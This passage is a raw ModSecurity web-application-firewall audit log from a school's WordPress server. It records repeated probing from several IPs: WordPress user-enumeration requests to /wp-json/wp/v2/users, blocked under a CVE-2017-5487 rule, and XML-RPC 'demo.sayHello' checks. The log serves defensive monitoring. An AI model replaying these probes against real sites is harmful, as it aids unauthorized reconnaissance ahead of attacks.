smkn22-jkt.sch.id X-Real-IP: 154.213.193.27 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.193.27 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b91b2b59-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b91b2b59-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746314275312062 3516 (- - -) Stopwatch2: 1746314275312062 3516; combined=1539, p1=497, p2=943, p3=0, p4=0, p5=99, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b91b2b59-Z-- --8db4ad61-A-- [04/May/2025:06:18:01 +0700] aBakKdsVQyl9V2B8Pt-v2wAAAEw 103.236.140.4 34002 103.236.140.4 8181 --8db4ad61-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.193.27 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.193.27 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8db4ad61-C-- demo.sayHello --8db4ad61-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8db4ad61-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746314281257607 5744 (- - -) Stopwatch2: 1746314281257607 5744; combined=4194, p1=492, p2=3438, p3=28, p4=30, p5=121, sr=69, sw=85, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8db4ad61-Z-- --90902958-A-- [04/May/2025:06:18:47 +0700] aBakV-chPF6irSergtv8fgAAANM 103.236.140.4 34008 103.236.140.4 8181 --90902958-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.32.117 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.32.117 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --90902958-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --90902958-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746314327962315 3409 (- - -) Stopwatch2: 1746314327962315 3409; combined=1487, p1=508, p2=947, p3=0, p4=0, p5=32, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --90902958-Z-- --4270bf6c-A-- [04/May/2025:06:18:54 +0700] aBakXuchPF6irSergtv8fwAAANU 103.236.140.4 34012 103.236.140.4 8181 --4270bf6c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.32.117 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.32.117 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4270bf6c-C-- demo.sayHello --4270bf6c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4270bf6c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746314334743513 4984 (- - -) Stopwatch2: 1746314334743513 4984; combined=3812, p1=429, p2=3162, p3=26, p4=23, p5=99, sr=66, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4270bf6c-Z-- --e2fca20b-A-- [04/May/2025:06:23:30 +0700] aBalcuchPF6irSergtv8hQAAAMU 103.236.140.4 34048 103.236.140.4 8181 --e2fca20b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.59.119 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.59.119 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e2fca20b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e2fca20b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746314610066874 3529 (- - -) Stopwatch2: 1746314610066874 3529; combined=1527, p1=494, p2=1000, p3=0, p4=0, p5=32, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e2fca20b-Z-- --4fc1d024-A-- [04/May/2025:06:23:35 +0700] aBald-chPF6irSergtv8hwAAAMc 103.236.140.4 34052 103.236.140.4 8181 --4fc1d024-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.59.119 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.59.119 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4fc1d024-C-- demo.sayHello --4fc1d024-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4fc1d024-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746314615374190 5288 (- - -) Stopwatch2: 1746314615374190 5288; combined=4007, p1=526, p2=3269, p3=22, p4=24, p5=96, sr=116, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4fc1d024-Z-- --ad945a0e-A-- [04/May/2025:06:28:17 +0700] aBamkechPF6irSergtv8jAAAANI 103.236.140.4 34082 103.236.140.4 8181 --ad945a0e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.89.191 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.89.191 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ad945a0e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ad945a0e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746314897957427 3224 (- - -) Stopwatch2: 1746314897957427 3224; combined=1307, p1=454, p2=817, p3=0, p4=0, p5=36, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad945a0e-Z-- --17dc8c5b-A-- [04/May/2025:06:28:22 +0700] aBamluchPF6irSergtv8jQAAANQ 103.236.140.4 34086 103.236.140.4 8181 --17dc8c5b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.89.191 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.89.191 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --17dc8c5b-C-- demo.sayHello --17dc8c5b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --17dc8c5b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746314902572688 5137 (- - -) Stopwatch2: 1746314902572688 5137; combined=3926, p1=456, p2=3251, p3=22, p4=25, p5=99, sr=67, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --17dc8c5b-Z-- --20ebb559-A-- [04/May/2025:07:12:37 +0700] aBaw9fnZiHJYHUAF8QfbuAAAABA 103.236.140.4 34422 103.236.140.4 8181 --20ebb559-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.180.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.180.230 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --20ebb559-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --20ebb559-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746317557644156 3363 (- - -) Stopwatch2: 1746317557644156 3363; combined=1466, p1=481, p2=944, p3=0, p4=0, p5=41, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --20ebb559-Z-- --c191034a-A-- [04/May/2025:07:12:43 +0700] aBaw-9sVQyl9V2B8Pt-wCQAAAEA 103.236.140.4 34434 103.236.140.4 8181 --c191034a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.180.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.180.230 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c191034a-C-- demo.sayHello --c191034a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c191034a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746317563888631 5405 (- - -) Stopwatch2: 1746317563888631 5405; combined=4139, p1=499, p2=3372, p3=30, p4=31, p5=123, sr=71, sw=84, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c191034a-Z-- --07c9b77e-A-- [04/May/2025:07:43:01 +0700] aBa4FechPF6irSergtv8swAAAM4 103.236.140.4 34616 103.236.140.4 8181 --07c9b77e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.92.13 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.92.13 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --07c9b77e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --07c9b77e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746319381841448 3143 (- - -) Stopwatch2: 1746319381841448 3143; combined=1305, p1=436, p2=839, p3=0, p4=0, p5=30, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --07c9b77e-Z-- --0e40476c-A-- [04/May/2025:07:43:09 +0700] aBa4HWJEE9ao5dcyYWnuVAAAAIE 103.236.140.4 34620 103.236.140.4 8181 --0e40476c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.92.13 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.92.13 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0e40476c-C-- demo.sayHello --0e40476c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0e40476c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746319389018408 6272 (- - -) Stopwatch2: 1746319389018408 6272; combined=4563, p1=557, p2=3774, p3=37, p4=40, p5=94, sr=75, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0e40476c-Z-- --81f5ca2a-A-- [04/May/2025:08:24:29 +0700] aBbBzdsVQyl9V2B8Pt-wOgAAAEE 103.236.140.4 34900 103.236.140.4 8181 --81f5ca2a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.181.168 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.181.168 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --81f5ca2a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --81f5ca2a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746321869935637 2974 (- - -) Stopwatch2: 1746321869935637 2974; combined=1267, p1=452, p2=784, p3=0, p4=0, p5=31, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81f5ca2a-Z-- --af53c846-A-- [04/May/2025:08:24:37 +0700] aBbB1WJEE9ao5dcyYWnubAAAAJI 103.236.140.4 34904 103.236.140.4 8181 --af53c846-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.181.168 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.181.168 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --af53c846-C-- demo.sayHello --af53c846-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --af53c846-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746321877282005 5114 (- - -) Stopwatch2: 1746321877282005 5114; combined=3846, p1=467, p2=3166, p3=23, p4=24, p5=96, sr=66, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --af53c846-Z-- --d6313e53-A-- [04/May/2025:08:42:32 +0700] aBbGCNsVQyl9V2B8Pt-wSAAAAEY 103.236.140.4 35072 103.236.140.4 8181 --d6313e53-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.165.118 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.165.118 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d6313e53-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d6313e53-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746322952761530 3184 (- - -) Stopwatch2: 1746322952761530 3184; combined=1306, p1=465, p2=812, p3=0, p4=0, p5=29, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d6313e53-Z-- --61361376-A-- [04/May/2025:08:42:36 +0700] aBbGDNsVQyl9V2B8Pt-wSQAAAEI 103.236.140.4 35074 103.236.140.4 8181 --61361376-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.96.88 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.96.88 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --61361376-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --61361376-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746322956623187 3154 (- - -) Stopwatch2: 1746322956623187 3154; combined=1341, p1=493, p2=819, p3=0, p4=0, p5=29, sr=130, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --61361376-Z-- --afaee21f-A-- [04/May/2025:08:42:39 +0700] aBbGD9sVQyl9V2B8Pt-wTAAAAEg 103.236.140.4 35080 103.236.140.4 8181 --afaee21f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.165.118 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.165.118 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --afaee21f-C-- demo.sayHello --afaee21f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --afaee21f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
